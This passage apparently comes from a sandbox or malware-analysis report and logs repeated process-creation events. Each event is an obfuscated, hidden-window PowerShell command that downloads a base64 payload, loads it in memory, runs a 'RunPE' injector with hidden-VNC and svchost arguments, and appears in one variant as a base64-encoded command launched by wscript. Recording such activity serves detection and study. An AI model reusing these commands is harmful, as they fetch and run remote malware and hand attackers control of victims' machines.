ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace 